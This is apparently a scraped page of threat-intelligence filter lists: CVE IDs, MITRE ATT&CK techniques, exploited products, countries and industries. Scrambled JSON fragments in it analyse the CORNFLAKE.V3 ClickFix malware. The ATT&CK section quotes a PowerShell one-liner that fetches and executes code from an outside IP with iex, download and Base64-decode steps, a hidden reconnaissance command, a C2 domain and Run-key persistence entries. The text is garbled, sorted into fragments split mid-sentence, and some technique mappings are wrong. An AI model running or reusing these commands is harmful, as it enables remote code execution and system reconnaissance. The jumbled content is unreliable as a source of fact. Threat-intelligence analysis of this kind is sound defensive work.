CVE-2025-53779 CVE-2025-53781 CVE-2025-53784 CVE-2025-53786 CVE-2025-53787 CVE-2025-53792 CVE-2025-53793 CVE-2025-54132 CVE-2025-54136 CVE-2025-54309 CVE-2025-54939 CVE-2025-54948 CVE-2025-54987 CVE-2025-55284 CVE-2025-57788 CVE-2025-57789 CVE-2025-57790 CVE-2025-57791 CVE-2025-6218 CVE-2025-6704 CVE-2025-7382 CVE-2025-7624 CVE-2025-7771 CVE-2025-8088 CVE-2025-8875 CVE-2025-8876 CVE-XXXX-Citrix_NetScaler_zero-day CVE-XXXX-Log4j
MITRE ATT&CK TTP All "# Download the Node.js zip file.\niwr -Uri $ZipURL -OutFile $ZipFile" ] "As seen in the Figure 2 "C:\\Users\\<User>\\AppData\\Roaming\\php\\config.cfg CORNFLAKE.V3 (PHP) sample" "C:\\Users\\<User>\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png WINDYTWIST.SEA backdoor sample dropped by CORNFLAKE.V3 (PHP)" ] "Cloud Accounts: T1078.004 "Command and Scripting Interpreter: T1059 "Content Injection: T1659 "context": "" "context": "The CORNFLAKE.V3 payload is Base64 encoded within the PowerShell dropper script "context": "The initial compromise occurs through ClickFix lure pages "context": "The initial infection chain starts with a PowerShell command executed through the Windows Run dialog. This PowerShell script downloads and executes further payloads." "context": "The malware creates and uses specific files and directories within the victim's file system "context": "The malware establishes persistence by creating registry Run keys "context": "The malware executes a series of commands to gather system information "context": "The malware modifies the Registry to achieve both initial execution via the RunMRU key and persistence via the Run key." "context": "The malware uses batch scripts containing reconnaissance commands "context": "The malware uses Cloudflare Tunnels to proxy traffic to its C2 server "context": "The malware uses PowerShell to download additional tools and payloads "contradictions": "" } "contradictions": "None" } "contradictions": "The article mentions the unobfuscated nature of the script "Credentials from Password Stores: T1555 "Data Encrypted for Impact: T1486 "Deobfuscate/Decode Files or Information: T1140 "Drive-by Compromise: T1189 "Email Forwarding Rule: T1114.003 "Exploit Public-Facing Application: T1190 "Exploitation for Client Execution: T1203 "Exploitation for Privilege Escalation: T1068 "Exploitation of Remote Services: T1210 "External Remote Services: T1133 "File and Directory Discovery: T1083 "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iCube Scheduled task that executes the CORNFLAKE.V3 (PHP) sample" ] "Impair Defenses: T1562 "independent_analysis": "" "independent_analysis": "The act of tricking a user into copying and pasting a malicious script into the Windows Run dialog is client side exploitation since it relies on the user to execute the command." "independent_analysis": "The entries 'ChromeUpdater' and 'iCube' under the Run key will trigger execution of the associated malware when the user logs in. This is a clear example of abusing the scheduled task/job mechanism for persistence." "independent_analysis": "The execution of `systeminfo` "independent_analysis": "The execution of PowerShell with the `-c` parameter to execute a command directly "independent_analysis": "The explicit mention of registry keys being modified "independent_analysis": "The listing of specific file paths indicates that the malware actively discovers and/or uses file system locations to store malicious components. This falls under file and directory discovery "independent_analysis": "The use of `irm` (Invoke-WebRequest alias) and `iwr` to download files from remote servers clearly indicates Ingress Tool Transfer. This is used to retrieve the necessary tools (Node.js, PHP interpreter) and the malware itself (CORNFLAKE.V3 variants and WINDYTWIST.SEA backdoor)." "independent_analysis": "The use of Base64 encoding represents a form of obfuscation. While not particularly sophisticated "independent_analysis": "The use of batch scripts for reconnaissance implies the use of the Windows Command Shell for executing these scripts. These batch scripts are explicitly used to collect domain information. The specific commands executed are indicative of reconnaissance activities." "independent_analysis": "The use of Cloudflare tunnels acts as a proxy "Indicator Removal: T1070 "Ingress Tool Transfer: T1105 "Inhibit System Recovery: T1490 "Input Capture: T1056 "Lateral Tool Transfer: T1570 "Native API: T1106 "Non-Application Layer Protocol: T1095 "Obfuscated Files or Information: T1027 "OS Credential Dumping: T1003 "Phishing: T1566 "powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\"" ] "PowerShell: T1059.001 "Process Injection: T1055 "Proxy: T1090 "Registry: T1112 "Remote Services: T1021 "Replication Through Removable Media: T1091 "Service Stop: T1489 "Spearphishing Attachment: T1193 "Spearphishing Link: T1192 "Supply Chain Compromise: T1195 "System Information Discovery: T1082 "The atst function "Trusted Relationship: T1199 "Unsecured Credentials: T1552 "Valid Accounts: T1078 "varying-rentals-calgary-predict.trycloudflare[.]com CORNFLAKE.V3 (PHP) C2 server associated with UNC5774" ] "Windows Command Shell: T1059.003 "Windows Management Instrumentation: T1047 `Get-PSDrive` `Get-Service` `tasklist /svc` and `arp -a` directly corresponds to the technique of System Information Discovery. The malware is actively gathering details about the system to potentially aid in further exploitation or lateral movement." and the ARP table." and the use of `irm` (Invoke-WebRequest alias) to download and execute code Application Layer Protocol: T1071 are clear indicators of PowerShell being used as an execution vector." as these locations are critical to the malware's operation." attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ." ] available drives called by main Cloud Accounts: T1078.004 Command and Scripting Interpreter: T1059 Command and Scripting Interpreter: T1059.003 Compromise: T1190 Compromised Credentials: T1552 containing the following entry which resulted in the download and execution of the next payload:" Content Injection: T1659 Credentials from Password Stores: T1555 Data Encrypted for Impact: T1486 Defacement: T1659 Deobfuscate/Decode Files or Information: T1140 directly maps to the Modify Registry technique. This involves adding/modifying values in these keys to achieve a specific objective." DNS Management: T1659 Drive-by Compromise: T1189 Email Forwarding Rule: T1114.003 executed via cmd.exe Exploit Public-Facing Application: T1190 Exploitation for Client Execution: T1203 Exploitation for Privilege Escalation: T1068 Exploitation of Remote Services: T1210 External Remote Services: T1133 File and Directory Discovery: T1083 however Impair Defenses: T1562 Improper Access Control: T1534 including the CORNFLAKE.V3 variants and the WINDYTWIST.SEA backdoor." including the Node.js runtime and the CORNFLAKE.V3 sample itself." including user privilege level Indicator Removal: T1070 Ingress Tool Transfer: T1105 Inhibit System Recovery: T1490 Input Capture: T1056 it serves to hide the content of the payload from casual inspection." known as ClickFix Lateral Tool Transfer: T1570 likely to obfuscate the true location of the C2 infrastructure and evade detection." lures website visitors into executing a downloader script which initiates a malware infection chain." masking the real destination server. The trycloudflare[.]com domain indicates the use of Cloudflare's tunneling service." Modify Registry: T1112 Native API: T1106 Non-Application Layer Protocol: T1095 Obfuscated Files or Information: T1027 OS Credential Dumping: T1003 particularly within the AppData directory Path Traversal: T1570 Phishing: T1566 PowerShell: T1059.001 Process Injection: T1055 Proxy: T1090 quotes": [ "$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>\n# Decode the Base64 string.\n$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)" ] quotes": [ "C:\\Users\\<User>\\AppData\\Roaming\\node-v22.11.0-win-x64\\ckw8ua56.log Copy of the CORNFLAKE.V3 (Node.js) sample used for persistence" quotes": [ "CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers." quotes": [ "Evidence of this activity was found in the HKEY_USERS\\User\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU registry key quotes": [ "Following this quotes": [ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdater Scheduled task that executes the CORNFLAKE.V3 (Node.js) sample" quotes": [ "irm 138.199.161[.]141:8080/$u|iex" quotes": [ "Mandiant observed that a PowerShell script was executed via the Run command using the Windows+R shortcut." quotes": [ "The first payload observed on the host was a batch script containing reconnaissance commands." ] quotes": [ "This deceptive technique quotes": [] Remote Code Execution: T1210 Remote Services: T1021 Replication Through Removable Media: T1091 running tasks/services Scheduled Task/Job: T1053 Screen Capture: T1113 service details Service Stop: T1489 Spearphishing Attachment: T1193 Spearphishing Link: T1192 specifically RunMRU for initial execution and Run for persistence Supply Chain Compromise: T1195 system information System Information Discovery: T1082 the malware attempts to collect system information using the following code: let cmd = execSync('chcp 65001 > $null 2>&1 ; echo \'version: ' + ver + '\' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { \'Runas: System\' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { \'Runas: Admin\' } else { \'Runas: User\' } ; systeminfo ; echo \'=-=-=-=-=-\' ; tasklist /svc ; echo \'=-=-=-=-=-\' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo \'=-=-=-=-=-\' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo \'=-=-=-=-=-\' ; arp -a', { encoding: 'utf-8', shell: 'powershell.exe', windowsHide: true });" ] the use of base64 is technically obfuscation" } the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image." ] to gather information about the system and the Active Directory environment." to store and execute its components Trusted Relationship: T1199 ttp": { "items": { "Impair Defenses: T1562 ttp": { "items": { "Scheduled Task/Job: T1053 Unsecured Credentials: T1552 Valid Accounts: T1078 Web Shell: T1505.003 where users are tricked into copying and pasting a malicious PowerShell script into the Windows Run dialog box." which are used to automatically execute the CORNFLAKE.V3 samples upon user logon." which necessitates decoding before execution." Windows Command Shell: T1059.003 Windows Management Instrumentation: T1047
Exploited Software All @toptal/picasso-charts @toptal/picasso-forms @toptal/picasso-provider @toptal/picasso-quote @toptal/picasso-select @toptal/picasso-shared @toptal/picasso-tailwind @toptal/picasso-typograph @toptal/picasso-typography @toptal/picasso-utils @xene/core /dev/shm 5G 5G Network Access Control Systems Accounts involved in loyalty programs Accounts without MFA Active Directory Active Directory (AD) AD360 Aeroflot Information Systems AES-128 Agentic AI AI Agents AI Systems AI tools AI-generated code Airtel Zerotouch router Amazon accounts Amazon ECS Amazon Q Developer Amazon Q Developer Extension for Visual Studio Code Amazon Q Developer VS Code extension Amazon Q Developer VS Code Extension Amazon Q Developer VS Code Extension (Amazon Q) AMD Zen 2 CPUs Amp Amp Code AmpCode Android Android Applications Android System Android VPN Apps (Group A) Android VPN Apps (Group B) Android VPN Apps (Group C) Anthropic Claude Code Anthropic Filesystem MCP Server Anthropic's Filesystem MCP Server Anthropic’s MCP Inspector Anthropic's Slack MCP Server AnyDesk Apache Apache ActiveMQ Apache Tomcat Apple Advanced Protection Program Apple ID AR email accounts AresLoader AsyncRAT AT&T and Verizon Networks Auth0 AVideo AWS AWS Trusted Advisor Azure Azure Functions APIs Backup Systems BadBazaar banking/government apps bcmbipdll.dll BIG-IP Bitbucket Bitdefender Bitdefender Box V1 Bl00dy ransomware Black Basta Blacksuit Ransomware BlackSuit ransomware Bloomberg Comdb2 Boa/0.93.15 Box Broadcom BCM5820X Broadcom's implementation of the adapters required to interface with the Windows Biometric Framework (WBF) Browser Extensions Browsers (Autofill Storage) BusyBox C programming language C# Random Caesars Entertainment California State Water Board website Carmaker's Online Dealership Portal Case Management/Electronic Case Files (CM/ECF) CDK Global Change Healthcare Chaos ransomware Chase Bank ChatGPT ChatGPT Codex Chemia Chrome CI/CD Pipelines Cisco Cisco Identity Services Engine (ISE) Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) Cisco IOS Cisco IOS and Cisco IOS XE Cisco IOS and Cisco IOS XE software Cisco IOS and IOS XE software (CVE-2018-0171) Cisco IOS Software Smart Install Feature Cisco ISE Cisco ISE Passive Identity Connector Cisco Networking Devices Cisco Secure Firewall Management Center (FMC) Cisco Secure Firewall Management Center Software Cisco Smart Install (SMI) Citrix NetScaler Citrix NetScaler ADC and Gateway City of Dallas servers Claude Claude Code Claude desktop CLEO MFT platforms (Harmony, VLTrader, Lexicom) ClickFix Clorox network cloud solution providers Cloud-based CRM system Cloudflare and Google DNS Cobalt Strike Colt Online Colt Technology Services (Potentially via CVE-2025-53770) Commvault Commvault Web Server Commvault's backup platform Commvault's QCommands ConnectWise Conti ControlVault Windows APIs CORNFLAKE.V3 COROS smartwatches CosMc's Promotional Membership Coupon Criteo OneTag Shared Storage API worklet (https://fledge.criteo.com/interest-group/abt/worklet) CrushFTP Cryptocurrency mining software curl.exe Cursor Cursor IDE Cylance Dahua surveillance cameras Danabot Dell ControlVault3 Dell ControlVault3 Firmware Dell ControlVault3 Plus Devices linked to global telecom providers Devin Devin AI Digital commerce platforms Digital Video Recorders Digital Video Recorders (DVRs) and WiFi routers Discord Invite System DNS DNS Management Domain Admin Accounts Domain User Accounts DoorDash Easy Anti-Cheat Eclipse ThreadX FileX Eclipse ThreadX FileX 8.5 Eclipse ThreadX FileX git commit 1b85eb2 Elastic Defend EDR Elasticsearch Electronic Voting Machines EncroChat Entra ID Envoy ERMAC Android Banking Trojan ESET eslint-config-prettier eslint-plugin-prettier ESXi hosts Exchange Server F-Secure F5 load balancers Facebook Facial Recognition Technology (FRT) systems Fickle Stealer find Firefox Flask web application FortiClient Endpoint Management Server Fortinet Fortinet Network Management Tool Fortinet SSL VPNs Foxit Reader Fraudulent cryptocurrency apps FreeVPN.One FreeVPN.One Chrome extension FScan Garmin Connect IQ API Gemini Gemini CLI Gemini's API Gemini's API via the llm CLI Gemini's web interface Genspark Git Repositories GitHub GitHub Copilot GitHub Copilot Agent GitHub Copilot Agent Mode GitLab GiveWP WordPress donation plugin GoodSync Google accounts Google Android (Qualcomm vulnerabilities) Google Assistant on an Android phone Google Cloud Google Forms Google Gemini CLI Google Gemini for Workspace Google Jules Google's Agent Development Kit (ADK) Google’s Jules got-fetch GPT-4o GPT-5 Great Firewall of China (GFW) Grindr Grok-4 gzip HAProxy HCL Notes HiDDeN HijackLoader Hikvision HitManPro Hotel Booking Systems HRSword HTML generated by GPT-4 HTTP/1.1 HTTP/1.1 Server Implementations Huawei equipment IAM Systems (Okta, Azure AD, Internal Authentication Services) IBM WebSphere ICS-specific malware variants iiNet order management system iiNet's order creation and tracking system Image I/O Framework ImageIO Infostealers Inotiv Systems and Data Inotiv's internal systems and data Instagram Intel CPUs Internet of Things (IoT) computers and devices internet-facing appliances, including small office/home office devices Intradev's systems iOS iOS Mobile Configuration Profiles iPadOS is Israeli Live News website j.js JAMF Java codebases Java program JavaScript Jenkins Jenkins Git Parameter Plugin Jetty Jira JuicyPotato Jules JupyterLab Kaseya Kaspersky KaWaLocker ransomware LameHug malware Lampion language server Large Language Models (LLMs) LastPass Latrodectus Ledger Nano S Plus Ledger Nano X Legacy devices in healthcare Legal Aid Agency Systems LibreWolf Linux kernel Linux Utilities (Cron jobs, systemd) LiteSpeed Web Server Llama-3-70b-instruct Local Accounts LockBit LockBit Black ransomware LockBit Windows encryptor Log4j LSQUIC Lumma Stealer LummaC2 LummaStealer M365 Copilot macOS macOS Sequoia macOS Sonoma macOS Ventura Mailchimp Manpower's network Manus Marks & Spencer MaterialX McAfee McDonald's Feel-Good Design Hub McDonald's Global Restaurant Standards portal McDonald's online delivery app McDonald's Staff Portals MCP mcp-remote MedDream PACS Premium Mercedes-Benz (NTG6) Meta's Llama-3-8b-instruct MGM Resorts MGM World MiCollab Microsoft Microsoft Applications via Entra OAuth Microsoft Azure cloud environment Microsoft cloud solution provider Microsoft Edge Microsoft Exchange Microsoft Exchange Server Microsoft Graphics Component Microsoft Installer (MSI) Microsoft MFA Microsoft multifactor authentication Microsoft Office Equation Editor Microsoft Quick Assist Microsoft Recall Microsoft SharePoint Microsoft SharePoint Enterprise Server 2016 Microsoft SharePoint on-prem servers Microsoft SharePoint Server Microsoft SharePoint Server 2019 Microsoft SharePoint Server Subscription Edition Microsoft software Microsoft UI Automation (UIA) Microsoft Word Microsoft's cloud email service Microsoft's corporate systems Mimikatz MintsLoader Mirai Mistral's Mistral-7b-instruct-v0.2 Mobile Devices MOVEit Transfer MSDT (via Follina) mshta.exe mygoqdos.com N-able N-central NDI (Network Device Interface) Nefilim Ransomware Netflix and Paypal Netgear WGR614v9 router NetSupport Netty NetWalker ngcp-rtpengine software NGINX Node.js Nomani Trojan NVIDIA Triton Inference Server Nvidia's H20 accelerators Octopus Deploy Okta Ollama Desktop On-premise Active Directory (AD) OpenAI Operator OpenAI’s “safe URL” rendering feature OpenAI's GPT Store OpenEXR OpenHands OpenLiteSpeed OpenSSH OpenSynergy Blue SDK OptiTune Orange Belgium IT Systems Orange Group IT Systems Outdated software Paradox.ai's Olivia Chatbot PDF-XChange Editor Perplexity's AI-powered browser Comet Phoenix Cryptolocker PHP Pirated Software/Cheat Add-ons Plex Plugins Post SMTP WordPress Plugin PostgreSQL PowerSchool PowerShell prettier PTW Python web server Python's TarFile.extractall() and TarFile.extract() Qilin ransomware Qualcomm Adreno GPUs Quantum ransomware Quick Service Restaurant (QSR) platforms RansomHub RealBlindingEDR Recall Redis Redline/Meta Stealer Rejetto HTTP File Server (HFS) Remote Desktop Protocol Remote Desktop Protocol (RDP) Remote Monitoring and Management (RMM) Software ReVault Ring Cameras Royal ransomware Ruby Marshal Module Ruby on Rails RubyGems.org rundll32.exe Ryuk SaaS Accounts Salesforce Salesforce CRM Salesforce Data Loader SAP NetWeaver AS Java Visual Composer Scalable Vector Graphics (SVG) ScreenConnect ScriptCase SectopRAT SentinelOne SHA-1 SharePoint SharePoint (on-prem) SharePoint Server SharePoint Server 2016 SharePoint Server 2019 SharePoint Server Subscription Edition SharePoint Servers SIKE Simple Network Management Protocol (SNMP) SimpleHelp Skoda Superb (MIB3) Skuld Stealer Sliver Smartphone SMBv1 SMS payments, banking trojans and spyware Social Media Management Systems SoftEther SoftEther VPN SoftEther VPN client SoftEther VPN Client solana-pump-test solana-spl-sdk SolarWinds SonicOS SonicWall Gen 7 Firewalls Sonicwall SMA 100 Series SonicWall SMA 100 Series (SMA 210, 410, 500v) SonicWall SMA 100 Series appliances SonicWall SMA appliances SonicWall SMA Appliances SonicWall SMA100 flaw (CVE-2021-20035) SonicWall SMA100 series devices Sophos products South Korean software products South Korean Software Products Splashtop streamer Sponsorship Management System (SMS) SQLite FTS5 extension SSH sshd (OpenSSH server) SSL VPN ssp_dump_lsass Stable Signature Steam StegaStamp Symantec synckit Syncro RMM SynologyPhotos SynthID tar-fs Tata Consultancy Services (TCS) Tea App TeaOnHer Telegram Telegraph Tenda AC6 Tenda AC6 V5.0 V02.03.01.110 The Co-op thesecure.biz Third-party signed legitimate driver AToolsKrnl64.sys ThrottleStop.sys driver Thunderbird TikTok Tizen OS tj-actions/changed-files GitHub Action ToolShell Tor Browser Trend Micro Trend Micro Apex One TRW Tuya Smart Life App Twilio U.S. Department of Education’s G5 portal U.S. phone network U.S. telecommunications infrastructure UE (User Equipment) Unmanaged Devices Unpatched Servers Unpatched VPNs US Companies' IT Systems USB charging ports USB drive VBScript vCenter Server Appliance (VCSA) Vertex AI Studio Vertex AI with a Gemini back end Vessel Traffic Management Systems Vidar VMware VMware ESXi VMware ESXi hypervisors VMware vCenter VMware vCenter Server Appliance (vCSA) VMware vSphere VMware vSphere 7.x VMware vSphere ESXi VMware vSphere vCenter Server Voice over Internet Protocol (VoIP) providers Volkswagen ID.4 (infotainment system: MEB ICAS3) Voting machines VPN Accounts VS Code Vulnerable Software Requiring Patches Vulnerable Windows Drivers Web Applications Web shells Webroot Websites Websites (Yemen Ministry of Foreign Affairs, Yemen Ministry of Security Media and Israeli Live News) WhatsApp Wi-Fi Routers Windows Windows 10 Windows 11 Windows 2000 Windows DLL (dynamic linked library) Windows GDI+ Windows Kerberos Windows Message Queuing Windows NTLM Windows OpenSSH client Windows OS Windows Recall Windows registry keys Windows Share Windows Win32K - GRFX Windows-based workstations and servers Windsurf Windsurf Cascade WINDYTWIST.SEA WinRAR WinRingO.sys driver WordPress Workday Workday's third-party CRM platform WWBN AVideo X2anylock (aka Warlock) ransomware xcopy.exe XenoRAT XSS.is Xworm XZ-Utils Yemen Ministry of Foreign Affairs website Yemen Ministry of Security Media website YouTube Yu1 Yu2 YubiKey Zelle Zen browser ZSAService.exe ZSATrayHelper.dll ZSATrayManager.exe ZSATunnel.exe Zscaler Client Connector
Involved Countries All Africa Angola Argentina Australia Austria Azerbaijan Belarus Belgium Brazil California Canada Chile China Costa Rica Côte d’Ivoire countries Czech Republic Debian Denmark Egypt England EU Europe European Union Fedora Finland France Germany Ghana Hong Kong India Indonesia Iran Iraq Ireland Israel Italy Japan Kenya Korea Latin America Latvia Lithuania Luxembourg Malaysia Mexico Mongolia Myanmar Netherlands New Zealand Nigeria North America North Korea Norway OpenSUSE Pakistan Panama Poland Portugal Qatar quotes Red Hat Romania Russia Russian Federation Scotland Serbia Seychelles Singapore Slovakia South Korea Spain Sweden Switzerland Taiwan Thailand Turkey U.S. UAE UK Ukraine United Arab Emirates United Kingdom United States US USA Vietnam Wales Yemen Zambia
Affected Industries All Academia Adult Entertainment Advertising Advertising Technology Advertising/Marketing Aerospace Aerospace and Defense AI Airline Airlines Animation Archiving Artificial Intelligence Artificial Intelligence (AI) Audio/Video Sharing Website Hosting Audio/Video Sharing Websites Automotive Automotive Retail Aviation Backup Software Banking Biotech Business Business Associations Businesses Cloud Computing Cloud Platforms Cloud Services Cloud Storage Cloud WAF and WAF On-Prem Providers commercial facilities Communication Computing Infrastructure Construction Consulting Consumer Electronics Consumer Electronics (IoT Devices) Consumer Goods Consumer Technology Content Creation Contract Research Organization (CRO) Corporate Cybersecurity corporate network Corrections Credit Monitoring/Identity Theft Protection Credit Reporting Credit Unions Criminal Record Check Services Critical Infrastructure critical manufacturing Critical National Infrastructure (CNI) Cryptocurrency Cryptocurrency Exchanges Cyber Insurance Cyber Security Cybercrime cybersecurity Cybersecurity Data Brokerage Data Centers Data Processing Dating Defense Defense Industrial Base Defense Industrial Base (DIB) Delivery Services Digital Content Creation Digital Infrastructure Diplomatic E-bike e-commerce E-commerce Education Education/Libraries Election Infrastructure Election Technology Elections Electronics Electronics Manufacturing Embedded Systems Emergency Services Employment Energy Enterprise Networking and IT Enterprise search and security Enterprise Software Enterprises Entertainment Faith-Based Organizations Fashion Finance Financial Financial Institutions Financial Services Fitness Food & Beverage Food and Beverage Food and Drink Food Delivery Services Food Service Food Services Footwear Freelance Talent Marketplace Gambling Gaming Government Government (Federal Civilian Executive Branch) Government (Public Sector) Government (SLTT) Government agencies government facilities Government Services Governmental Graphic Design Hardware Providers Hardware Provision Health Care Health Insurance Health Technology healthcare Healthcare Higher Education Home Networking Home Security Homeland Security Hospitality Human Resources Information Technology Information Technology (IT) Insurance International Organizations Internet Service Providers (ISPs) IT Service Providers IT Services Jewelry Retail Journalism Law Enforcement Law Enforcement/Justice Legal Local Government Logistics Managed Service Providers (MSPs) Managed Services Providers (MSPs) Manufacturing Maritime Media Media (Television Network) Media and Broadcasting Media and Entertainment Medical Devices Military Mobile Device Manufacturing Mobile Security Museums Networking News News and Media NFT Marketplace Nuclear Nuclear Power Nuclear Weapons Oil and Gas Online Search Open-Source Software Organizations holding sponsor licenses Parks and Recreation Payment Processing Personal Information Management Pharmaceutical Pharmaceuticals Ports Postal Service Power Management Professional Services Professional, Scientific, and Technical Services Public Safety Public Sector Quick Service Restaurants (QSRs) Research Research and Education Retail Science News Security Operations Security Technology Semiconductor Semiconductor Manufacturing Semiconductors Shipping Smart Home Technology Social Media Social Networking Software Software Development Software Engineering Software Providers Software-as-a-Service (SaaS) Space Communications Sports Apparel Staffing Strategic Planning Streaming Services Surveillance Technologies Technology Technology (Silicon Valley) Technology (Storage Device Manufacturing) Telcos and Media Telecommunications Ticketing Tobacco Toy Manufacturing Trading Companies Transportation Travel Vacation Rentals Video Game Industry Video Streaming Platforms Video Surveillance Systems Visual Effects VPN Water Water Systems Wealth Management Web Application Hosting Web Hosting Web Infrastructure Web Security Web Services Web3 Website Hosting